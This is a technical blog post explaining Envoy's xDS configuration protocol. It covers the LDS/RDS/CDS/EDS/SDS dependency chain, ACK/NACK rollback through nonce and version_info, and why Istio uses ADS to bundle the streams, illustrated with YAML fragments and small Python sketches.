&lt;p&gt;I was debugging Istio routing the other day, and honestly, I had a moment where I felt a bit "creeped out."&lt;/p&gt;

&lt;p&gt;You tweak a &lt;code&gt;VirtualService&lt;/code&gt; YAML file, hit &lt;code&gt;kubectl apply&lt;/code&gt;, and within seconds, the routing rules across hundreds of Envoy proxies scattered throughout the cluster switch over perfectly.&lt;/p&gt;

&lt;p&gt;There's no process restart. You aren't running &lt;code&gt;nginx -s reload&lt;/code&gt;. Rolling out configuration changes to thousands of hosts happens in seconds, and &lt;strong&gt;even if you push a completely broken YAML, it magically rolls back to a safe state on its own.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;It feels like magic, but naturally, there's an incredibly gritty mechanism running behind the scenes. That mechanism is &lt;strong&gt;xDS (the "x Discovery Service" family of APIs, where "x" is a placeholder for the resource type)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;You might think of it as just "Envoy's config protocol," but xDS has long escaped Envoy's borders. Today, it's standardized as the &lt;strong&gt;"Universal Data Plane API" (the lingua franca of L4/L7 networking)&lt;/strong&gt; by the CNCF xDS API Working Group, and it's heavily used beyond Envoy by proxyless gRPC and Istio Ambient's ztunnel. As of 2026, it is the absolute most important protocol to understand if you want to talk about service mesh.&lt;/p&gt;

&lt;p&gt;We are going to read through this from top to bottom—covering why static configuration is a nightmare, the dependency chain of LDS/RDS/CDS/EDS, and the ACK/NACK rollback mechanism that saves us from outages.&lt;/p&gt;




&lt;h2&gt;
  
  
  0. Prerequisites: Why use an "API" to push configurations?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Envoy and Protocol Buffers
&lt;/h3&gt;

&lt;p&gt;The decisive difference between Envoy and traditional reverse proxies like Nginx or HAProxy is that Envoy was built from the ground up on the premise that &lt;strong&gt;configuration will be injected externally, in real-time, via gRPC.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Envoy doesn't do service discovery on its own. The control plane (like Istio's &lt;code&gt;istiod&lt;/code&gt;) watches Kubernetes &lt;code&gt;Pods&lt;/code&gt; and &lt;code&gt;Services&lt;/code&gt;, translates them into strongly-typed &lt;strong&gt;Protocol Buffers (proto3)&lt;/strong&gt; messages that Envoy understands, and streams them over HTTP/2 gRPC. By using gRPC streaming instead of JSON polling, it achieves incredibly low latency and type safety.&lt;/p&gt;
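&lt;p&gt;To make the translation step concrete, here is a hedged sketch. A real control plane emits Protocol Buffers (a &lt;code&gt;ClusterLoadAssignment&lt;/code&gt;, in this case) over a gRPC stream; the plain dict below only mirrors that message's shape, and the function name is mine.&lt;/p&gt;

```python
def to_eds_resource(cluster_name, pod_ips, port):
    """Translate a list of Pod IPs into an EDS-shaped resource (dict stand-in
    for the ClusterLoadAssignment proto a real control plane would stream)."""
    return {
        "cluster_name": cluster_name,
        "endpoints": [{
            "lb_endpoints": [
                {"endpoint": {"address": {"socket_address": {
                    "address": ip, "port_value": port}}}}
                for ip in pod_ips
            ],
        }],
    }

resource = to_eds_resource("api-v1-cluster", ["10.0.1.15", "10.0.1.22"], 8080)
print(len(resource["endpoints"][0]["lb_endpoints"]))  # 2
```

&lt;p&gt;Every time the watched Pods change, the control plane rebuilds this resource and pushes the new version down the stream.&lt;/p&gt;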




&lt;h2&gt;
  
  
  1. The Despair of Static Configuration and the Awakening of xDS
&lt;/h2&gt;

&lt;p&gt;If you were to configure Envoy statically, you’d end up writing an &lt;code&gt;envoy.yaml&lt;/code&gt; file like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;static_resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;listeners&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_listener&lt;/span&gt;
    &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;0.0.0.0&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
    &lt;span class="c1"&gt;# ...filter configs...&lt;/span&gt;
  &lt;span class="na"&gt;clusters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_backend&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;STRICT_DNS&lt;/span&gt;
    &lt;span class="na"&gt;load_assignment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cluster_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_backend&lt;/span&gt;
      &lt;span class="na"&gt;endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;lb_endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;endpoint&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;10.0.1.15&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the idyllic days when you only had 10 Pods, this was fine. But in today's Kubernetes environments, Pods scale every second, they fluctuate due to HPA, and IPs change constantly as nodes are retired. &lt;strong&gt;Every time a backend IP changes, are you going to rewrite the config files for all proxies and restart their processes?&lt;/strong&gt; That's pure insanity. Connections would drop, latency would spike, and the system would collapse.&lt;/p&gt;

&lt;p&gt;That is exactly why dynamic configuration (xDS) is mandatory.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8gn5jztgse5vpd9h73od.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8gn5jztgse5vpd9h73od.png" alt="dynamic configuration" width="800" height="339"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With xDS, Envoy can seamlessly start routing traffic to new Pod IPs with absolutely zero restarts.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. The Core 5 Discovery Services
&lt;/h2&gt;

&lt;p&gt;The "x" in xDS is a wildcard. The protocol is heavily segmented into five major services (APIs) based on the scope of the configuration.&lt;/p&gt;

&lt;p&gt;These aren't just parallel configuration items—they have &lt;strong&gt;strict dependencies (pointers)&lt;/strong&gt; on one another. Grasping this dependency chain is step one to mastering xDS.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LDS (Listener)&lt;/strong&gt;: Which port should we listen on?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RDS (Route)&lt;/strong&gt;: Which path routes to where?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CDS (Cluster)&lt;/strong&gt;: What are the connection settings for the destination service?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;EDS (Endpoint)&lt;/strong&gt;: What are the actual IP addresses of that service?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SDS (Secret)&lt;/strong&gt;: What certificate data (e.g., for TLS termination) do we need?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Let's look at how they point to each other at the YAML/code level.&lt;/p&gt;

&lt;h3&gt;
  
  
  ① LDS → Pointing to RDS
&lt;/h3&gt;

&lt;p&gt;LDS creates the entry point, defining "Listen for HTTP on port 8080." However, instead of hardcoding IP destinations for the traffic, it embeds a &lt;strong&gt;reference (name) to the RDS&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Data streamed from LDS (Listener Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_listener&lt;/span&gt;
&lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;0.0.0.0&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
&lt;span class="na"&gt;filter_chains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;filters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.filters.network.http_connection_manager&lt;/span&gt;
    &lt;span class="na"&gt;typed_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;rds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;route_config_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_routes&lt;/span&gt;  &lt;span class="c1"&gt;# ← [KEY] Refers to RDS resource "my_routes"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ② RDS → Pointing to CDS
&lt;/h3&gt;

&lt;p&gt;RDS is the signpost. Called up by LDS as &lt;code&gt;my_routes&lt;/code&gt;, this config evaluates HTTP paths or headers and returns &lt;strong&gt;a logical cluster name (a reference to CDS)&lt;/strong&gt;. Istio's &lt;code&gt;VirtualService&lt;/code&gt; gets translated into this layer.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Data streamed from RDS (Route Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_routes&lt;/span&gt;
&lt;span class="na"&gt;virtual_hosts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api_host&lt;/span&gt;
  &lt;span class="na"&gt;domains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;api.example.com"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="na"&gt;routes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;match&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;prefix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/v1/"&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
    &lt;span class="na"&gt;route&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;cluster&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;api-v1-cluster&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;# ← [KEY] Refers to CDS resource "api-v1-cluster"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ③ CDS → Pointing to EDS
&lt;/h3&gt;

&lt;p&gt;CDS defines the &lt;em&gt;nature&lt;/em&gt; of the designated cluster. It determines the load balancing algorithm (Round Robin, etc.) and circuit breaker thresholds. This is the domain of Istio's &lt;code&gt;DestinationRule&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;It still doesn't write down specific IP addresses here; it &lt;strong&gt;delegates the final resolution to EDS&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Data streamed from CDS (Cluster Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-v1-cluster&lt;/span&gt;
&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;EDS&lt;/span&gt;                           &lt;span class="c1"&gt;# ← [KEY] Declares we will fetch endpoints dynamically via EDS&lt;/span&gt;
&lt;span class="na"&gt;eds_cluster_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;eds_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;ads&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;           &lt;span class="c1"&gt;# (Requests EDS via ADS)&lt;/span&gt;
&lt;span class="na"&gt;lb_policy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ROUND_ROBIN&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ④ Touching Down at EDS
&lt;/h3&gt;

&lt;p&gt;Finally, EDS returns the &lt;strong&gt;actual IP addresses of the Pods&lt;/strong&gt; tied to that cluster. Because clusters scale up and down, EDS is the most aggressively updated component in xDS.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Data streamed from EDS (Endpoint Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;cluster_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-v1-cluster&lt;/span&gt;
&lt;span class="na"&gt;endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;lb_endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;endpoint&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;10.0.1.15&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;# ← Actual IP&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;endpoint&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;10.0.1.22&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;# ← Actual IP&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ⑤ Encrypting via SDS (mTLS) and Zero-Downtime Rotation
&lt;/h3&gt;

&lt;p&gt;Once the destination IP is pinned down, we don't just blindly fire the packet. In modern service meshes, mTLS (mutual TLS) encryption between Pods is mandatory. This is where &lt;strong&gt;SDS (Secret Discovery Service)&lt;/strong&gt; steps onto the stage.&lt;/p&gt;

&lt;p&gt;Inside the CDS definition, it dictates "use this specific TLS context when talking to this cluster." Envoy then uses SDS to dynamically fetch the certificate (SVID) and private key straight into memory.&lt;br&gt;
What's spectacular here is &lt;strong&gt;certificate rotation&lt;/strong&gt;. Before a certificate expires, you historically had to restart the web server process. With SDS, the microsecond a new certificate is issued, it is flashed into memory via xDS, enabling &lt;strong&gt;100% zero-downtime, automated certificate rotation&lt;/strong&gt;. Because this is highly sensitive secret data, this specific stream is strictly gated and protected.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Conceptual data streamed from SDS (Secret Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;tls_certificate&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;certificate_chain&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;inline_string&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-----BEGIN&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;CERTIFICATE-----&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;..."&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
  &lt;span class="na"&gt;private_key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;inline_string&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-----BEGIN&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;PRIVATE&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;KEY-----&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;..."&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In short, a request traces the configuration pointers in the exact order of &lt;strong&gt;LDS → RDS → CDS → EDS (+ SDS)&lt;/strong&gt;, picking up its route, its destination IPs, and its encryption along the way, and takes flight.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8u3r89nb81anmrsie92.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8u3r89nb81anmrsie92.png" alt="xds flow" width="769" height="1052"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You must never forget this "dependency order." It is the exact reason why ADS (Aggregated Discovery Service), which we'll discuss later, exists.&lt;/p&gt;
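&lt;p&gt;The pointer chase above can be sketched in a few lines. This is a toy resolver over plain dicts keyed the same way as the YAML fragments (&lt;code&gt;my_listener&lt;/code&gt; → &lt;code&gt;my_routes&lt;/code&gt; → &lt;code&gt;api-v1-cluster&lt;/code&gt; → IPs); Envoy's real data model is far richer, this only shows the dependency order.&lt;/p&gt;

```python
# Toy resolver for the LDS -> RDS -> CDS -> EDS pointer chain from the
# fragments above. Illustrative only; not Envoy's actual data model.
listeners = {"my_listener": {"route_config_name": "my_routes"}}
routes    = {"my_routes": {"/v1/": "api-v1-cluster"}}
clusters  = {"api-v1-cluster": {"type": "EDS"}}
endpoints = {"api-v1-cluster": ["10.0.1.15:8080", "10.0.1.22:8080"]}

def resolve(listener_name, path_prefix):
    """Walk the four pointer hops and return the candidate backend addresses."""
    route_name   = listeners[listener_name]["route_config_name"]
    cluster_name = routes[route_name][path_prefix]
    assert clusters[cluster_name]["type"] == "EDS"  # CDS delegates IPs to EDS
    return endpoints[cluster_name]

print(resolve("my_listener", "/v1/"))  # ['10.0.1.15:8080', '10.0.1.22:8080']
```

&lt;p&gt;If any hop in that chain is missing, resolution fails — which is exactly the failure mode the next sections deal with.&lt;/p&gt;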




&lt;h2&gt;
  
  
  3. Surviving Broken Configs: The ACK/NACK Flow
&lt;/h2&gt;

&lt;p&gt;In an architecture where dynamic configs are blasted out to thousands of proxies, pushing a "bad config" causes apocalyptic damage. What happens if the control plane sends a structurally invalid resource or a conflicting route setting?&lt;/p&gt;

&lt;p&gt;Does Envoy bug out and crash? ...Absolutely not.&lt;br&gt;
xDS is armed with a fiercely robust rollback mechanism called &lt;strong&gt;"NACK" (Negative Acknowledgement)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;xDS communication is a bidirectional gRPC stream. When a &lt;code&gt;DiscoveryResponse&lt;/code&gt; arrives from the control plane, Envoy attempts to apply it. It then packages the result into a &lt;code&gt;DiscoveryRequest&lt;/code&gt; and shoots it back to the control plane.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ij53peb0yp9jijbu5pq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ij53peb0yp9jijbu5pq.png" alt="nack" width="800" height="442"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The absolute beauty of this design is that &lt;strong&gt;even if a NACK occurs, Envoy's stream does NOT sever; it just keeps humming along using the last-known-good config (v1)&lt;/strong&gt;.&lt;br&gt;
Even if an operator brutally applies a flawed &lt;code&gt;VirtualService&lt;/code&gt; to Kubernetes, Envoy essentially says "screw this," returns a NACK, and existing traffic doesn't suffer a single dropped request. It simply waits for a corrected config to be pushed.&lt;/p&gt;

&lt;p&gt;Two control fields are the key players here: &lt;code&gt;nonce&lt;/code&gt; and &lt;code&gt;version_info&lt;/code&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;nonce&lt;/code&gt;&lt;/strong&gt;: A simple ID that says, "Hey, which specific update payload are you giving me the validation result for?"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;version_info&lt;/code&gt;&lt;/strong&gt;: The factual state that says, "As a result, what version of the config am I currently running?"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If Envoy simply parrots back the latest &lt;code&gt;version_info&lt;/code&gt; the server sent, it's categorized as an "ACK (Success)." If it returns an older version number, the server realizes it's a "NACK (Failure)." It’s brilliantly simple, yet ruthlessly effective.&lt;/p&gt;
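&lt;p&gt;Seen from the control plane, the ACK/NACK decision is a few comparisons. A hedged sketch (the dict fields mirror &lt;code&gt;DiscoveryRequest&lt;/code&gt;, but real servers track this per resource type and per stream):&lt;/p&gt;

```python
def classify(pushed_version, pushed_nonce, request):
    """Decide what the proxy's follow-up DiscoveryRequest means."""
    if request["response_nonce"] != pushed_nonce:
        return "stale"  # reply to an older push; ignore it
    if request["version_info"] == pushed_version:
        return "ACK"    # proxy applied the new version and now runs it
    return "NACK"       # apply failed; proxy still runs the old version

print(classify("v2", "n-7", {"response_nonce": "n-7", "version_info": "v2"}))  # ACK
print(classify("v2", "n-7", {"response_nonce": "n-7", "version_info": "v1"}))  # NACK
```

&lt;p&gt;In a real NACK, the request also carries an &lt;code&gt;error_detail&lt;/code&gt; explaining why validation failed.&lt;/p&gt;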




&lt;h2&gt;
  
  
  4. Why We Need ADS (Aggregated Discovery Service)
&lt;/h2&gt;

&lt;p&gt;Earlier, I mentioned that LDS → RDS → CDS → EDS share a strict dependency chain.&lt;/p&gt;

&lt;p&gt;What would happen if you subscribed to these four APIs via &lt;strong&gt;completely separate gRPC streams&lt;/strong&gt; asynchronously from the control plane? Naturally, due to network latency or processing timing, their arrival order would scramble.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Imagine the worst-case scenario.&lt;/strong&gt;&lt;br&gt;
A new RDS (route setting) arrives first. It says, "route traffic to &lt;code&gt;cluster-B&lt;/code&gt;". Envoy eagerly updates its settings and tries to shove traffic towards &lt;code&gt;cluster-B&lt;/code&gt;. However, the streams for CDS and EDS (the actual definition and IPs of &lt;code&gt;cluster-B&lt;/code&gt;) are lagging slightly behind and haven't hit Envoy yet.&lt;/p&gt;

&lt;p&gt;As a result, Envoy concludes "the destination cluster doesn't exist" and &lt;strong&gt;starts aggressively throwing 503 Service Unavailable errors&lt;/strong&gt;. A service mesh where 503s run rampant every time a configuration changes is completely unusable.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Fix: Bundling the Streams (ADS)
&lt;/h3&gt;

&lt;p&gt;To prevent this "temporary inconsistency in an eventually consistent system," &lt;strong&gt;ADS (Aggregated Discovery Service)&lt;/strong&gt; was forged.&lt;/p&gt;

&lt;p&gt;ADS multiplexes (aggregates) the requests and responses for ALL xDS resource types (LDS/RDS/CDS/EDS) into &lt;strong&gt;a single solitary gRPC stream&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6futt305amjz11r46ylo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6futt305amjz11r46ylo.png" alt="ads" width="800" height="518"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;By bundling everything into one stream, the control plane gains the ability to enforce strict sequencing: &lt;strong&gt;"I will make Envoy apply CDS/EDS first, and I won't send RDS until I get the ACKs back."&lt;/strong&gt;&lt;br&gt;
Istio's control plane (&lt;code&gt;istiod&lt;/code&gt;) uses this ADS approach by default to stream configurations safely.&lt;/p&gt;
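
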